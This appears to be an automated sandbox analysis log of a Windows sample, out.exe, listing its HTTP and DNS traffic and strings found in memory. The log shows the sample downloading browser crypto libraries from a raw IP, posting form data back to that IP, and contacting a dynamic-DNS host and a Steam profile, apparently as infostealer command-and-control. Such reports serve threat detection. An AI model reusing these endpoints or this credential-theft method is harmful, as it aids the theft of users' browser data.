                              Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                              Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                              Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
                              Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
                              Source: out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/V
                              Source: out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/_
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/e
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/freebl3.dll
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/mozglue.dll
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/mozglue.dllNTEG
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/mozglue.dll_
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dll
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dll#
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dll.4.349.12.106.214DEX
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dllGE
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dlls
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dlly
                              Source: out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/n
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/nss3.dll
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/o
                              Source: out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/s
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dll
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dll5
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dllE
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dllg
                              Source: out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dllm
                              Source: out.exe, 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmp, out.exe, 00000000.00000002.2676579434.0000000002F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/sqlp.dll
                              Source: out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/vcruntime140.dll
                              Source: out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/vcruntime140.dll4/msvcp140.dllGE
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://49.12.106.214GDAK
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997
                              Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                              Source: out.exe, 00000000.00000002.2676579434.0000000003074000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, IIIEBG.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                              Source: out.exe, 00000000.00000002.2676579434.0000000003074000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, IIIEBG.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                              Source: out.exeString found in binary or memory: https://community.akamai.steams
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.akamai.steamstatic.
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2297618303.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                              Source: AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: out.exe, 00000000.00000003.2565106602.0000000027DFB000.00000004.00000020.00020000.00000000.sdmp, AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                              Source: out.exe, 00000000.00000002.2681168765.0000000024E6C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                              Source: out.exe, 00000000.00000003.2565106602.0000000027DFB000.00000004.00000020.00020000.00000000.sdmp, AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
